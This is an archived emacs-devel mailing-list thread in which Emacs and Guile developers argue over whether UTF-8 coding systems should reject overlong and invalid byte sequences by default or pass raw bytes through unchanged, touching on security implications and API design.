* Re: Emacs Lisp's future 2014-10-07 14:04 ` Richard Stallman @ 2014-10-07 14:14 ` David Kastrup [not found] ` <"<83y4srjaot.fsf"@gnu.org> ` (2 more replies) 2014-10-07 14:21 ` Andreas Schwab 1 sibling, 3 replies; 404+ messages in thread From: David Kastrup @ 2014-10-07 14:14 UTC (permalink / raw) To: Richard Stallman Cc: mhw, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii, stephen Richard Stallman <rms@gnu.org> writes: > [[[ To any NSA and FBI agents reading my email: please consider ]]] > [[[ whether defending the US Constitution against all enemies, ]]] > [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > > For > >> example, the ASCII quote (") can be represented as the single byte 0x22, > >> the two byte sequence 0xC0 0xA2, etc. > > What does Emacs do now with a file that contains these "overlong" > sequences? UTF-8 is defined as not containing "overlong" sequences, so Emacs decodes them into two raw-byte indicating characters, one indicating 0xC0, one indicating 0xA2. When encoding, it reassembles them into 0xC0 0xA2. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
[parent not found: <"<83y4srjaot.fsf"@gnu.org>]
* Re: Emacs Lisp's future 2014-10-07 14:14 ` David Kastrup [not found] ` <"<83y4srjaot.fsf"@gnu.org> @ 2014-10-07 15:15 ` Mark H Weaver 2014-10-07 15:31 ` Andreas Schwab 2014-10-07 16:59 ` Eli Zaretskii 2014-10-08 0:47 ` Richard Stallman 2 siblings, 2 replies; 404+ messages in thread From: Mark H Weaver @ 2014-10-07 15:15 UTC (permalink / raw) To: David Kastrup Cc: Richard Stallman, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii, stephen David Kastrup <dak@gnu.org> writes: > Richard Stallman <rms@gnu.org> writes: > >> [[[ To any NSA and FBI agents reading my email: please consider ]]] >> [[[ whether defending the US Constitution against all enemies, ]]] >> [[[ foreign or domestic, requires you to follow Snowden's example. ]]] >> >> For >> >> example, the ASCII quote (") can be represented as the single byte 0x22, >> >> the two byte sequence 0xC0 0xA2, etc. >> >> What does Emacs do now with a file that contains these "overlong" >> sequences? > > UTF-8 is defined as not containing "overlong" sequences, so Emacs > decodes them into two raw-byte indicating characters, one indicating > 0xC0, one indicating 0xA2. When encoding, it reassembles them into > 0xC0 0xA2. When editing a file, this is probably the right default behavior, although ideally it should warn the user. However, if the overlong sequence came from the network, and Emacs propagates it unchanged to internal subsystems[*] (e.g. via command-line arguments to subprocesses), that's not good. It exposes another program to invalid input -- a program that might not be designed for exposure to possible attacks via overlong encodings. [*] By "internal subsystem" I mean any part of the overall system that's not directly accessible to attacks. This includes subprocesses or daemons that are not accessible from the outside network. Mark ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 15:15 ` Mark H Weaver @ 2014-10-07 15:31 ` Andreas Schwab 2014-10-07 15:40 ` David Kastrup 2014-10-07 16:34 ` Mark H Weaver 2014-10-07 16:59 ` Eli Zaretskii 1 sibling, 2 replies; 404+ messages in thread From: Andreas Schwab @ 2014-10-07 15:31 UTC (permalink / raw) To: Mark H Weaver Cc: David Kastrup, Richard Stallman, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii, stephen Mark H Weaver <mhw@netris.org> writes: > However, if the overlong sequence came from the network, and Emacs > propagates it unchanged to internal subsystems[*] (e.g. via command-line > arguments to subprocesses), that's not good. It exposes another program > to invalid input -- a program that might not be designed for exposure to > possible attacks via overlong encodings. At least it doesn't make it worse (it is unchanged from the situation if you remove Emacs as a filter). Andreas. -- Andreas Schwab, SUSE Labs, schwab@suse.de GPG Key fingerprint = 0196 BAD8 1CE9 1970 F4BE 1748 E4D4 88E3 0EEA B9D7 "And now for something completely different." ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 15:31 ` Andreas Schwab @ 2014-10-07 15:40 ` David Kastrup 2014-10-07 18:32 ` Stephen J. Turnbull 2014-10-07 16:34 ` Mark H Weaver 1 sibling, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-07 15:40 UTC (permalink / raw) To: Andreas Schwab Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii, stephen Andreas Schwab <schwab@suse.de> writes: > Mark H Weaver <mhw@netris.org> writes: > >> However, if the overlong sequence came from the network, and Emacs >> propagates it unchanged to internal subsystems[*] (e.g. via command-line >> arguments to subprocesses), that's not good. It exposes another program >> to invalid input -- a program that might not be designed for exposure to >> possible attacks via overlong encodings. > > At least it doesn't make it worse (it is unchanged from the situation if > you remove Emacs as a filter). And if Emacs is supposed to be used as a propagate-only-valid-utf-8 filter (which it definitely can do), that should be in the spec and Emacs should then programmed to do the desired failure mode. Just bombing out in some predetermined manner in some fixed location is not a substitute for properly planned behavior. If you want Emacs (or GUILE, or whatever) to take a particular action in a particular case in order to provide output with particular guarantees to particular processing stages, then "somebody thought it was a good idea" in some inconvenient place is not a substitute. Unless told differently, a tool like GUILE or Emacs, when used as a filter, should do exactly _those_ filtering operations you tell it. Not more, not less. Anything else is _guaranteed_ to get in the way eventually. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 15:40 ` David Kastrup @ 2014-10-07 18:32 ` Stephen J. Turnbull 2014-10-07 18:41 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-07 18:32 UTC (permalink / raw) To: David Kastrup Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa, monnier, Mark H Weaver, Eli Zaretskii David Kastrup writes: > Just bombing out in some predetermined manner in some fixed location is > not a substitute for properly planned behavior. Nobody proposed that, so please stop arguing against it. > Unless told differently, a tool like GUILE or Emacs, when used as a > filter, should do exactly _those_ filtering operations you tell it. Right. All Mark and I want is to default safely. Ie, if you invoke an encoding named "utf-8", you get strictly conformant output. When Emacs is being used as a filter, you just have to use the 'utf-8-with-rawbytes coding system, and when Emacs is being used for what is presumably valid text, you use the 'utf-8 coding system. IOW, it's use of the *-with-rawbytes coding systems that turns Emacs into a filter. I think that is way preferable to the alternative where 'utf-8 gives rawbytes, and you have to use 'utf-8-strict to get validation. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 18:32 ` Stephen J. Turnbull @ 2014-10-07 18:41 ` David Kastrup 0 siblings, 0 replies; 404+ messages in thread From: David Kastrup @ 2014-10-07 18:41 UTC (permalink / raw) To: Stephen J. Turnbull Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa, monnier, Mark H Weaver, Eli Zaretskii "Stephen J. Turnbull" <stephen@xemacs.org> writes: > David Kastrup writes: > > > Just bombing out in some predetermined manner in some fixed location is > > not a substitute for properly planned behavior. > > Nobody proposed that, so please stop arguing against it. > > > Unless told differently, a tool like GUILE or Emacs, when used as a > > filter, should do exactly _those_ filtering operations you tell it. > > Right. All Mark and I want is to default safely. Ie, if you invoke an > encoding named "utf-8", you get strictly conformant output. > > When Emacs is being used as a filter, you just have to use the > 'utf-8-with-rawbytes coding system, and when Emacs is being used for > what is presumably valid text, you use the 'utf-8 coding system. IOW, > it's use of the *-with-rawbytes coding systems that turns Emacs into a > filter. > > I think that is way preferable to the alternative where 'utf-8 gives > rawbytes, and you have to use 'utf-8-strict to get validation. Emacs' current behavior where the low-level operations _obey_ _without_ _asking_ is quite preferable. Again, you want to have the engine's responsibilities confused with the application's responsibilities. And that means that you generally have to work around the engine for getting basic work done. And figure out just where in the operating layers you have to apply overrides in order to get "don't mess with this" semantics. Since verification is best applied at a single place in an application, being denied control over that place whenever you don't have _every_ _single_ _layer_ under your own control is a nuisance. I am glad that Emacs does not get in my hair as an application programmer like that, and it would be doubly appropriate for GUILE not to do that. GUILE is supposed to be an extension language and system. As such, it should not try governing how an application is organizing its verification processes. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 15:31 ` Andreas Schwab 2014-10-07 15:40 ` David Kastrup @ 2014-10-07 16:34 ` Mark H Weaver 2014-10-07 17:50 ` David Kastrup 1 sibling, 1 reply; 404+ messages in thread From: Mark H Weaver @ 2014-10-07 16:34 UTC (permalink / raw) To: Andreas Schwab Cc: David Kastrup, Richard Stallman, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii, stephen Andreas Schwab <schwab@suse.de> writes: > Mark H Weaver <mhw@netris.org> writes: > >> However, if the overlong sequence came from the network, and Emacs >> propagates it unchanged to internal subsystems[*] (e.g. via command-line >> arguments to subprocesses), that's not good. It exposes another program >> to invalid input -- a program that might not be designed for exposure to >> possible attacks via overlong encodings. > > At least it doesn't make it worse (it is unchanged from the situation if > you remove Emacs as a filter). In the case of mere "filtering", you might be right in some cases. However, the case I'm worried about is where some small piece of the hostile input is extracted and passed as an argument to another program. In cases like this it doesn't make sense to think of emacs as a "filter", and you'd never be able to "remove" it. It's like saying that a web application that passes unsanitized input to an SQL query "doesn't make it worse", and that the situation is unchanged from if you provided public access to the SQL database. Mark ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 16:34 ` Mark H Weaver @ 2014-10-07 17:50 ` David Kastrup 2014-10-07 18:36 ` Mark H Weaver 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-07 17:50 UTC (permalink / raw) To: Mark H Weaver Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii, stephen Mark H Weaver <mhw@netris.org> writes: > Andreas Schwab <schwab@suse.de> writes: > >> Mark H Weaver <mhw@netris.org> writes: >> >>> However, if the overlong sequence came from the network, and Emacs >>> propagates it unchanged to internal subsystems[*] (e.g. via command-line >>> arguments to subprocesses), that's not good. It exposes another program >>> to invalid input -- a program that might not be designed for exposure to >>> possible attacks via overlong encodings. >> >> At least it doesn't make it worse (it is unchanged from the situation if >> you remove Emacs as a filter). > > In the case of mere "filtering", you might be right in some cases. > > However, the case I'm worried about is where some small piece of the > hostile input is extracted and passed as an argument to another program. > In cases like this it doesn't make sense to think of emacs as a > "filter", and you'd never be able to "remove" it. > > It's like saying that a web application that passes unsanitized input to > an SQL query "doesn't make it worse", and that the situation is > unchanged from if you provided public access to the SQL database. If GUILE or Emacs is supposed to sanitize input, you tell it to sanitize input. That's different from GUILE/Emacs deciding over your head what is good for your application. Again, confusing the responsibilities and capabilities of an engine from those of an application is sure to lead to mismatches between requirements and capabilities. An engine has to work. Not just given certain circumstances, but always. Anything else is a recipe for trouble. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 17:50 ` David Kastrup @ 2014-10-07 18:36 ` Mark H Weaver 2014-10-07 18:56 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Mark H Weaver @ 2014-10-07 18:36 UTC (permalink / raw) To: David Kastrup Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii, stephen David Kastrup <dak@gnu.org> writes: > Mark H Weaver <mhw@netris.org> writes: > >> Andreas Schwab <schwab@suse.de> writes: >> >>> Mark H Weaver <mhw@netris.org> writes: >>> >>>> However, if the overlong sequence came from the network, and Emacs >>>> propagates it unchanged to internal subsystems[*] (e.g. via command-line >>>> arguments to subprocesses), that's not good. It exposes another program >>>> to invalid input -- a program that might not be designed for exposure to >>>> possible attacks via overlong encodings. >>> >>> At least it doesn't make it worse (it is unchanged from the situation if >>> you remove Emacs as a filter). >> >> In the case of mere "filtering", you might be right in some cases. >> >> However, the case I'm worried about is where some small piece of the >> hostile input is extracted and passed as an argument to another program. >> In cases like this it doesn't make sense to think of emacs as a >> "filter", and you'd never be able to "remove" it. >> >> It's like saying that a web application that passes unsanitized input to >> an SQL query "doesn't make it worse", and that the situation is >> unchanged from if you provided public access to the SQL database. > > If GUILE or Emacs is supposed to sanitize input, you tell it to sanitize > input. That's different from GUILE/Emacs deciding over your head what > is good for your application. I've already said more than once that I agree Guile and Emacs should provide the *option* to handle invalid byte sequences transparently, if explicitly requested to do so, and furthermore that this is appropriate default behavior when editing files. What I'm saying is that in most other cases, the codecs should be strict, and therefore this should be the default behavior of the underlying functions. When users call an Emacs function to decode UTF-8, it should report an error if that input isn't actually UTF-8. Conversely, when encoding UTF-8, the output should be UTF-8 and not some arbitrary byte sequence. Relying on users to explicitly sanitize the result of decoding UTF-8 to check for "raw bytes", and to explicitly check for "raw bytes" before encoding UTF-8 (as if that term didn't already have a well-known meaning that excludes arbitrary byte sequences) is a recipe for security holes. Mark ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 18:36 ` Mark H Weaver @ 2014-10-07 18:56 ` David Kastrup 2014-10-07 19:21 ` Stephen J. Turnbull 2014-10-07 23:11 ` Mark H Weaver 0 siblings, 2 replies; 404+ messages in thread From: David Kastrup @ 2014-10-07 18:56 UTC (permalink / raw) To: Mark H Weaver Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii, stephen Mark H Weaver <mhw@netris.org> writes: > Relying on users to explicitly sanitize the result of decoding UTF-8 > to check for "raw bytes", and to explicitly check for "raw bytes" > before encoding UTF-8 (as if that term didn't already have a > well-known meaning that excludes arbitrary byte sequences) is a recipe > for security holes. You are calling "application programmers" here "users" and call them incapable of designing their application. Any application in need of sanitizing will not stop in its requirements at UTF-8 sanitization. You cannot successfully cater for clueless application programmers. And nobody says that GUILE should _crash_ when provided non-sanitized UTF-8. It has to be able to deal with everything thrown at it. And you want it to _not_ do that by default. That means that _any_ programmer wanting to do his own verification will not be able to use _any_ module provided by someone else which does not explicitly override the defaults, since then modules he has no control over will refuse cooperating. GUILE is an extension language and system. It should _not_ do policing. Every attempt at policing makes it impossible to design the policing into the place where it makes sense. Worse, it leads to sloppy code since then people start to consider an internal UTF-8 based encoding to be identical to an external UTF-8 encoding, making it _impossible_ to design byte-transparent workflows. That is the current state of GUILE 2, and as an application programmer I can testify that it is a huge headache. Both in practice as well as conceptually. I am glad that Emacs started its history with a multibyte encoding incompatible with any external encoding since that has given it lots of impetus to get that distinction right. With the "we don't want to cater for raw bytes by default" attitude you'll never get away in a reasonably reliable manner from the "our code will not deal with raw bytes" situation you have now with regard to string manipulation. It took Emacs years to get this into a really reliable and good state, with many more active users of multibyte character sets than GUILE has. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 18:56 ` David Kastrup @ 2014-10-07 19:21 ` Stephen J. Turnbull 2014-10-07 23:11 ` Mark H Weaver 1 sibling, 0 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-07 19:21 UTC (permalink / raw) To: David Kastrup Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa, monnier, Andreas Schwab, Eli Zaretskii David Kastrup writes: > With the "we don't want to cater for raw bytes by default" attitude > you'll never get away in a reasonably reliable manner from the "our code > will not deal with raw bytes" situation you have now with regard to > string manipulation. If Emacs and Emacs Lisp developers never can make it work, I think that says more about Emacs than about the concept of standards-based program design. I'm sure the Guile community will succeed as Python did. It took Python about 3 months to implement PEP 383, another 6 to actually publicly release a Python using it, and no, Python has never defaulted to anything but strict error handling ("crash and traceback on invalid input") since. Nobody complains, because in practice strict is almost good enough for interactive programs (ask the user to clean up the input and resubmit), and the few who do need rawbytes are perfectly happy writing stream = open(filename, 'r', encoding='utf-8', errors='surrogateescape') when it's needed. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 18:56 ` David Kastrup 2014-10-07 19:21 ` Stephen J. Turnbull @ 2014-10-07 23:11 ` Mark H Weaver 2014-10-08 3:03 ` David Kastrup 2014-10-11 18:50 ` Florian Weimer 1 sibling, 2 replies; 404+ messages in thread From: Mark H Weaver @ 2014-10-07 23:11 UTC (permalink / raw) To: David Kastrup Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii, stephen David Kastrup <dak@gnu.org> writes: > You cannot successfully cater for clueless application programmers. It is not "clueless" to expect a UTF-8 encoder to produce valid UTF-8. Mark ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 23:11 ` Mark H Weaver @ 2014-10-08 3:03 ` David Kastrup 2014-10-08 15:03 ` Mark H Weaver 2014-10-11 18:50 ` Florian Weimer 1 sibling, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-08 3:03 UTC (permalink / raw) To: Mark H Weaver Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii, stephen Mark H Weaver <mhw@netris.org> writes: > David Kastrup <dak@gnu.org> writes: >> You cannot successfully cater for clueless application programmers. > > It is not "clueless" to expect a UTF-8 encoder to produce valid UTF-8. We are not talking about "producing" but "reproducing" here. It is clueless to expect manure to magically turn into roses without instructions. If you need sanitized output, you need to sanitize your input at some point of time. If that point of time is not under your control, that will cause worse problems than you started with. You get denial-of-service attack vectors when raising exceptions, you get quoting attack vectors when silently removing or replacing characters. It is much harder to deal with those behaviors reliably than it is to deal with faithful reproduction, letting you put the cleanup strategies at the place in processing where they belong. Like, before any quoting, and after any unquoting. And, of course, having the full power of GUILE's string and regexp processing for dealing programmatically with that cleanup. There is no "we don't have to deal with that input anyway" excuse for a programming platform. Emacs learnt its MULE lessons the hard way. And these days, it does not let its application programmers down. And since the programmers were free to put any safety nets at any place _they_ want without risking gratuitous breakage, Emacs will inform the user of possible coding problems exactly where the application programmers considered warnings appropriate, and with exactly the fallbacks and options that the programmers considered appropriate for that particular use case. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-08 3:03 ` David Kastrup @ 2014-10-08 15:03 ` Mark H Weaver 2014-10-08 15:11 ` Eli Zaretskii 2014-10-08 15:54 ` David Kastrup 0 siblings, 2 replies; 404+ messages in thread From: Mark H Weaver @ 2014-10-08 15:03 UTC (permalink / raw) To: David Kastrup Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii, stephen David Kastrup <dak@gnu.org> writes: > Mark H Weaver <mhw@netris.org> writes: > >> David Kastrup <dak@gnu.org> writes: >>> You cannot successfully cater for clueless application programmers. >> >> It is not "clueless" to expect a UTF-8 encoder to produce valid UTF-8. > > We are not talking about "producing" but "reproducing" here. I stand by my statement above, regardless of what input is feed into the UTF-8 encoder, and I think I've said enough to make my point. You are immovable, as always, and I don't want to waste any more time on this. You can add this to your long list of reasons why you consider me a bad maintainer for Guile. Mark ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-08 15:03 ` Mark H Weaver @ 2014-10-08 15:11 ` Eli Zaretskii 2014-10-08 15:54 ` David Kastrup 1 sibling, 0 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-10-08 15:11 UTC (permalink / raw) To: Mark H Weaver Cc: dak, rms, schwab, dmantipov, emacs-devel, handa, monnier, stephen > From: Mark H Weaver <mhw@netris.org> > Date: Wed, 08 Oct 2014 11:03:51 -0400 > Cc: Richard Stallman <rms@gnu.org>, Andreas Schwab <schwab@suse.de>, > dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org, > monnier@iro.umontreal.ca, Eli Zaretskii <eliz@gnu.org>, stephen@xemacs.org > > You are immovable, as always That was uncalled-for, and actually goes both ways, you know. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-08 15:03 ` Mark H Weaver 2014-10-08 15:11 ` Eli Zaretskii @ 2014-10-08 15:54 ` David Kastrup 2014-10-09 3:26 ` Stephen J. Turnbull 1 sibling, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-08 15:54 UTC (permalink / raw) To: Mark H Weaver Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii, stephen Mark H Weaver <mhw@netris.org> writes: > David Kastrup <dak@gnu.org> writes: > >> Mark H Weaver <mhw@netris.org> writes: >> >>> David Kastrup <dak@gnu.org> writes: >>>> You cannot successfully cater for clueless application programmers. >>> >>> It is not "clueless" to expect a UTF-8 encoder to produce valid UTF-8. >> >> We are not talking about "producing" but "reproducing" here. > > I stand by my statement above, regardless of what input is feed into the > UTF-8 encoder, and I think I've said enough to make my point. You are > immovable, as always, and I don't want to waste any more time on this. Shrug. It's hard to move me when I have been around in similar circumstances and when I've been been exposed to the consequences of similar decisions before. AUCTeX's prv-xemacs.el contains (defcustom preview-buffer-recoding-alist (if (and (= emacs-major-version 21) (< emacs-minor-version 5)) '((utf-8-unix . raw-text-unix) (utf-8-dos . raw-text-dos) (utf-8-mac . raw-text-mac) (utf-8 . raw-text))) "Translate buffer encodings into process encodings. TeX is sometimes bad dealing with 8bit encodings and rather bad dealing with multibyte encodings. So the process encoding output might need to get temporarily reprocessed into the original byte stream before the buffer characters can be identified. XEmacs 21.4 is rather bad at preserving incomplete multibyte characters in that process. This variable makes it possible to use a reconstructable coding system in the run buffer instead. Specify an alist of base coding system names here, which you can get using \(coding-system-name (coding-system-base buffer-file-coding-system)) in properly detected buffers." :group 'preview-latex :type '(repeat (cons symbol symbol))) (defun preview-buffer-recode-system (base) "This is supposed to translate unrepresentable base encodings into something that can be used safely for byte streams in the run buffer. XEmacs mule-ucs is so broken that this may be needed." (or (cdr (assq (coding-system-name base) preview-buffer-recoding-alist)) base)) as opposed to prv-emacs.el's (defsubst preview-buffer-recode-system (base) "This is supposed to translate unrepresentable base encodings into something that can be used safely for byte streams in the run buffer. A noop for Emacs." base) What you don't see is the associated man-month of bug reports, hassles, head-scratching, debugging, solution-finding, abstracting and boiling down into a solution. I've been at the receiving end of the "reproducing the input bytes faithfully is not a priority" mindframe, and it is costly. If I am immovable here, it's because I'm old. I've been a programmer long enough in this game to know that "but when _we_ do that, everything will be different" pans out rarely enough. And it's not like I'm not getting bitten at the current point of time while trying to get LilyPond (and thus C++ strings) play well with GUILE2 without buying into massive conversion overhead and/or possible column counting mismatches. We write out PostScript code. A mixture of material in Latin1, UTF16BE, and binary. We read in utf8 code and have a flex scanner working on in-memory byte streams it shares with the GUILE reader interpreting it in UTF-8. It's not like I don't know what I am talking about here. > You can add this to your long list of reasons why you consider me a > bad maintainer for Guile. To be honest, I was not even aware you were maintainer for GUILE. There are several committers to the stable/2.0 branch (and sometimes merging from there to master), and there is Andy Wingo committing to master in occasional spurts of commits of highly experimental character that are not discussed on any public list. While I am clueless about the official roles of the various developers, the resulting workflows look more evolved than designed. I can hardly blame you for something that you do not appear to have much choice in. Many GNU maintainers are sovereigns without subjects or a castle, mostly endowed with the power to let the sun rise in the morning. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-08 15:54 ` David Kastrup @ 2014-10-09 3:26 ` Stephen J. Turnbull 2014-10-09 4:14 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-09 3:26 UTC (permalink / raw) To: David Kastrup Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa, monnier, Andreas Schwab, Eli Zaretskii David Kastrup writes: > I've been at the receiving end of the "reproducing the input bytes > faithfully is not a priority" mindframe, and it is costly. XEmacs is irrelevant -- it simply doesn't possess the technology. It *is* a goal for us, I've tried, and that code is *hairy*, I failed. So all your examples of pain you've personally suffered are irrelevant. Nobody here is advocating "not a priority." Engineering faithful roundtripping isn't a priority for Emacs only because it's already possible and robust. I'm assuming that will continue to be the case in a Guile-based Emacs. (If not, sure, that needs to be fixed. Nobody is saying otherwise, and I've made that explicit several times.) So the only question is "what is the default." Please stop trying to make this into anything else. You advocate a default that is convenient for the app programmer, who saves one project-wide "sed -i -e s/utf-8/utf-8-with-rawbytes/ *" to achieve the same degree of insecurity and reproducibility his app would have with the default you prefer. We advocate a default that is safer for the user, who may lose their life savings if a filter for 419 phish fails because a character is encoded with "long" UTF-8, and fails to match the regexp which expects the character and not rawbytes. I don't know that there are any Emacs MUA users who have ever fallen for a phishing message, but I assure you that I personally have observed "long" UTF-8 in messages that are otherwise duplicates of correctly encoded spams. Those bastards don't miss a trick. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 3:26 ` Stephen J. Turnbull @ 2014-10-09 4:14 ` David Kastrup 2014-10-09 7:31 ` Stephen J. Turnbull 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-09 4:14 UTC (permalink / raw) To: Stephen J. Turnbull Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa, monnier, Andreas Schwab, Eli Zaretskii "Stephen J. Turnbull" <stephen@xemacs.org> writes: > We advocate a default that is safer for the user, GUILE is not a user application but a programming language. > who may lose their life savings if a filter for 419 phish fails Can we have terrorism with that scaremongering? > because a character is encoded with "long" UTF-8, and fails to match > the regexp which expects the character and not rawbytes. I am glad that Emacs and sed and other utilities don't trash PostScript files by default in order to save me from phishing. > I don't know that there are any Emacs MUA users who have ever fallen > for a phishing message, but I assure you that I personally have > observed "long" UTF-8 in messages that are otherwise duplicates of > correctly encoded spams. Those bastards don't miss a trick. So? Does that mean that string operations should throw an error when encountering $$$$$$$$$$$$$ in a string? To save the user from scams? If you keep confusing the responsibilities of platform, application and user, you arrive at a system you have to work around with constantly because it knows better than you what you want. A network application that throws exceptions internally when fed non-UTF-8 byte combinations is an attack vector for denial-of-service attacks. And since the naive programmer does not expect exceptions for just reading strings, this is a very real danger. And since GUILE is an extension language, implicit conversions for C/GUILE call gates are hard to avoid, and when every call gate is locked towards passing strings representing arbitrary data, you will not be able to use libraries without having access to the semantics of every call gate. At any rate, there is no point to this discussion. It tends to solve itself in practice by developers at some point of time becoming tired of ever the same application programmer level problems getting reported, and application programmers becoming tired of ever the same developer attitude regarding internals that refuse to "simply work". At least I am still allowed to call cons without triggering an error when the second argument is not a list. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 4:14 ` David Kastrup @ 2014-10-09 7:31 ` Stephen J. Turnbull 2014-10-09 8:05 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-09 7:31 UTC (permalink / raw) To: David Kastrup Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa, monnier, Andreas Schwab, Eli Zaretskii David Kastrup writes: > > who may lose their life savings if a filter for 419 phish fails > > Can we have terrorism with that scaremongering? Are you really unaware that such exploits happen every day? You're not the only programmer who deprecates security because *your* applications are "secure enough" and it "can't" happen to you, you know.[1] That's *why* those exploits are possible -- because some of those good honest folks were *dead wrong*, and all too often we don't know which ones were wrong until somebody gets scammed. > If you keep confusing the responsibilities of platform, application > and user, you arrive at a system you have to work around with > constantly because it knows better than you what you want. Unfortunately, I'm not the one who lacks understanding. I'm well aware that security is costly in convenience and functionality. Nevertheless, I am willing to suffer those losses (which will be far less than your exaggerated fears), and advocate imposing them on you as well, because I'm aware of the consequences of doing otherwise. Footnotes: [1] Heck, that's what the devils at the top of Tokyo Electric Power Co said as their Fukushima reactor blew its own roof off, and they *continue* to say that such accidents are "unimaginable". ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 7:31 ` Stephen J. Turnbull @ 2014-10-09 8:05 ` David Kastrup 0 siblings, 0 replies; 404+ messages in thread From: David Kastrup @ 2014-10-09 8:05 UTC (permalink / raw) To: Stephen J. Turnbull Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa, monnier, Andreas Schwab, Eli Zaretskii "Stephen J. Turnbull" <stephen@xemacs.org> writes: > David Kastrup writes: > > > > who may lose their life savings if a filter for 419 phish fails > > > > Can we have terrorism with that scaremongering? > > Are you really unaware that such exploits happen every day? So does terrorism. But the existence of threats is no excuse for handwaving justifications of measures that do nothing to address the threats. > You're not the only programmer who deprecates security because *your* > applications are "secure enough" and it "can't" happen to you, you > know. At the current point of time, we are more talking about deprecating security theatre rather than security. Primitive operations that fail rather than process and pass on information are attack vectors for denial-of-service attacks. > Unfortunately, I'm not the one who lacks understanding. I'm well > aware that security is costly in convenience and functionality. How about you explain in what respect XEmacs' non-round-trippability of utf-8 encoding helps with the security of running AUCTeX? How about explaining in what respect it helps with security in _any_ regard that XEmacs is not able to faithfully reproduce its input? How are you even supposed to _scan_ for malicious input if you refuse to decode it in recognizable manner? Again: the responsibilities of an engine and of an application are different. And not understanding that and thinking that the former can somehow absolve the latter from doing its job if it is annoying enough... Security theatre. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 23:11 ` Mark H Weaver 2014-10-08 3:03 ` David Kastrup @ 2014-10-11 18:50 ` Florian Weimer 1 sibling, 0 replies; 404+ messages in thread From: Florian Weimer @ 2014-10-11 18:50 UTC (permalink / raw) To: Mark H Weaver Cc: David Kastrup, Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii, stephen * Mark H. Weaver: > David Kastrup <dak@gnu.org> writes: >> You cannot successfully cater for clueless application programmers. > > It is not "clueless" to expect a UTF-8 encoder to produce valid UTF-8. It doesn't work all that well in practice on systems (like GNU) which are not predominantly Unicode-based. Dealing gracefully with invalid UTF-8 sometimes means producing invalid UTF-8. For example, a backup program needs to be able to save and restore files whose name is not encoded in UTF-8. ^ permalink raw reply [flat|nested] 404+ messages in thread
